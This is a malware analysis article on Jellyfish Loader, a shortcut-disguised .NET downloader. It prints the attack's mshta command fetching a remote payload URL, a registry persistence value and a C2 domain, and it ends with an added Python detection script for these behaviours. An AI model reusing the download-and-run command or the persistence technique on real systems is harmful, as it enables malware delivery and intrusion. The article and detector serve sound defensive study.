A new threat, Jellyfish Loader, has been identified as a .NET-based shellcode downloader disguised as a Windows shortcut. Despite its unusual features suggesting it may still be in development, it is capable of deploying various other types of malware.
Jellyfish Loader Malware
Researchers from Cyble have identified a unique threat, Jellyfish Loader, originating from Poland. The malicious file is a zip archive containing a Windows shortcut (.lnk) disguised as a PDF. When opened, the shortcut downloads and runs a 64-bit .NET executable named BinSvc.exe, known as Jellyfish Loader.
The loader is not obfuscated. It uses AsyncTaskMethodBuilder for asynchronous operations and validates SSL certificates for secure communication with its command-and-control (C&C) server. Its dependencies are embedded with Fody and Costura, which helps it evade detection. Once running, the loader gathers system information for fingerprinting and includes a function for executing shellcode received from the remote server.
Here’s a closer look at the malware’s behavior. It reaches systems through phishing or spear phishing. The lure is a zip archive with a double extension, Lisa.pdf.zip, containing a similarly named Lisa.pdf.lnk file. Opening the shortcut launches the following command, whose JavaScript starts the payload download:
"C:\Windows\System32\mshta.exe" "http://file.compute-ec2-aws.com/0d9cb9fe-5714-433c-aa58-0f26675979f0"
The .lnk file uses junk data to evade detection and includes a decoy PDF with an image of a key and keychain, alongside the Jellyfish Loader payload.
Payload
Let’s focus on the actual payload, the Jellyfish Loader, located at C:\Users\user\AppData\Local\Microsoft\BinSvc.exe. Downloaded by the script behind the fake PDF, it establishes persistence by creating the following registry value:
Registry value: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
Data: C:\Users\user\AppData\Local\Microsoft\BinSvc.exe
After launching, Jellyfish Loader gathers system fingerprint data, including runtime and build identifiers, program details, host and user names, domain, system architecture, OS version, and process ID. This information is serialized as JSON and encoded with Base64.
Command and Control
The malware contacts its command-and-control (C2) server via an HTTP POST request to https://ping.connectivity-check.com. While the domain appears legitimate, it has been used in previous malware campaigns, including the 2018 Olympic Destroyer operation.
This suggests that Jellyfish Loader, which shares similarities with the Olympic Destroyer in code and infrastructure, may be linked to potential attacks on the upcoming 2024 Paris Olympics.
Safety Recommendations:
- Be Cautious with Downloads: Avoid downloading and running files from unknown or untrusted sources. Always verify the legitimacy of files before opening them.
- Inspect File Extensions: Be wary of files with double extensions (e.g., filename.pdf.exe). Ensure that files are not disguised as something they are not.
- Enable Security Features: Use built-in security features of your operating system, such as file extension visibility, to better identify suspicious files.
- Employ Security Software: Use reputable antivirus and anti-malware programs to scan files before executing them.
- Educate on Threats: Stay informed about the latest threats and security practices. Awareness is key to avoiding common attack vectors.
- Verify Sources: Ensure that files come from legitimate sources and check digital signatures or hashes when available.
- Keep Systems Updated: Regularly update your operating system and applications to protect against known vulnerabilities.
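The three observable behaviours this write-up describes, the double-extension lure (Lisa.pdf.lnk), mshta.exe fetching a remote URL, and persistence through the HKCU ...\Windows\LOAD value, can be turned into simple host-telemetry checks. The Python below is an added example, not code from Cyble or from the article; the event format and the sample events are constructed, and the URL in them is a placeholder.

```python
import re

# Indicators taken from the Jellyfish Loader write-up above; every event below
# is constructed for illustration, not captured from a real host.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
EXEC_EXTS = {"lnk", "exe", "hta", "js", "vbs", "scr", "bat", "cmd"}
LOAD_KEY = r"software\microsoft\windows nt\currentversion\windows\load"
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def is_double_extension_lure(path: str) -> bool:
    """Names like Lisa.pdf.lnk: a document extension in front of an executable one."""
    parts = re.split(r"[\\/]", path.lower())[-1].split(".")
    return len(parts) >= 3 and parts[-2] in DOC_EXTS and parts[-1] in EXEC_EXTS

def is_remote_mshta(cmdline: str) -> bool:
    """mshta.exe started with a remote URL argument, as the malicious .lnk does."""
    tokens = cmdline.replace('"', " ").split()
    return (any(t.lower().endswith("mshta.exe") for t in tokens)
            and any(URL_RE.match(t) for t in tokens))

def is_load_persistence(reg_path: str) -> bool:
    """A write to the rarely used HKCU ...\\Windows\\Load autostart value."""
    return reg_path.lower().endswith(LOAD_KEY)

CHECKS = {"file_create": (is_double_extension_lure, "double-extension lure"),
          "process_create": (is_remote_mshta, "mshta remote execution"),
          "registry_set": (is_load_persistence, "Load-value persistence")}

def triage(events: list) -> list:
    """One finding per event that matches a behaviour from the infection chain."""
    findings = []
    for ev in events:
        check, label = CHECKS.get(ev["type"], (None, None))
        if check and check(ev["data"]):
            findings.append(f"{label}: {ev['data']}")
    return findings

# Constructed telemetry mirroring the chain in the article; the URL is a placeholder.
SAMPLE_EVENTS = [
    {"type": "file_create", "data": r"C:\Users\user\Downloads\Lisa.pdf.lnk"},
    {"type": "file_create", "data": r"C:\Users\user\Downloads\report.pdf"},
    {"type": "process_create",
     "data": '"C:\\Windows\\System32\\mshta.exe" "http://example.invalid/placeholder"'},
    {"type": "process_create", "data": r"C:\Windows\System32\mshta.exe C:\temp\local.hta"},
    {"type": "registry_set",
     "data": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\LOAD"},
]
if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_EVENTS)))
```

The Load value is a legitimate but rarely populated autostart location, so any write to it on a workstation is worth a look even without the other two signals.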